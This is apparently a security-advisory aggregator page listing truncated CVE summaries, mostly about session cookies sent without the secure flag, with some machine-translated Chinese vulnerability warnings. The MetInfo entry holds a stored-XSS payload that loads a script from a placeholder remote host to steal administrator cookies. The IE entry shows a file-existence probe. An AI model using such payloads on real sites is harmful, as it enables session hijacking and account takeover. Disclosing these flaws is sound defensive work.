novnc: session hijack through insecurely set session token cookies
It was discovered that noVNC did not properly set the 'secure' flag when issuing cookies. An attacker could use this flaw to intercept cookies via a man-in-the-middle attack...
Session fixation
IBM Jazz Team Server, as used in Rational Collaborative Lifecycle Management; Rational Quality Manager 3.x before 3.0.1.6 iFix 3, 4.x before 4.0.7, and 5.x before 5.0.1; and other Rational products, does not set the secure flag for the session cookie in an https session, which makes it easier for...
CVE-2014-3853
Pyplate 0.08 does not set the secure flag for the id cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...
Session fixation
The Browser in IBM Sterling Connect:Direct 1.4 before 1.4.0.11 and 1.5 through 1.5.0.1 does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...
Mastery OA contents of the log stored XSS can get the cookie-vulnerability warning-the black bar safety net
Mastery OA 2013 and 2010 versions: the Office Anywhere 2013 work log edit page has a stored XSS, and after a superior views the log the cookie can be stolen. 1. In the work log edit page source code, bypassing one character lets an XSS be constructed!!! 1. The interception to giv...
CVE-2011-4728
The Server Administration Panel in Parallels Plesk Panel 10.2.0build1011110331.18 does not set the secure flag for a cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session, as demonstrated by cookies us...
The latest MetInfo enterprise website management system V4. 0 XSS 0Day-vulnerability warning-the black bar safety net
Author: Noevil Post To: T00ls.Net Method: in the online message form, fill the Name field with NoevilSCRIPT SRC="HTTP://xxx/xss.js"/SCRIPT and any Content. When the administrator views the message list in the back end, the Cookie is intercepted automatically, and NoXss will try to keep the session and log back in to ta...
CVE-2009-5051
Hastymail2 before RC 8 does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...
Session fixation
Hastymail2 before RC 8 does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...
DEBIAN-CVE-2009-3584
SQL-Ledger 2.8.24 does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...
PT-2008-5423 · Open Source Matters · Joomla!
Name of the Vulnerable Software and Affected Versions: Joomla! version 1.5.8 Description: The issue makes it easier for remote attackers to capture the session cookie by intercepting its transmission within an http session, as the secure flag is not set for the session cookie in an https session...
Design/Logic Flaw
Octeth Oempro 3.5.5.1, and possibly other versions before 4, does not set the secure flag for the PHPSESSID cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...
An IE browser vulnerability security testing and analysis-vulnerability warning-the black bar safety net
Today I saw a small IE vulnerability on the Internet and did the following simple analysis. The usage is as follows. Program code: img src="sysimage://C:\WINNT\Notepad.exe,7 7 7" onError="document.write('<b>File Exists!</b>');" At first it seemed strange that sysimage:// is a protocol, so in IE enter:...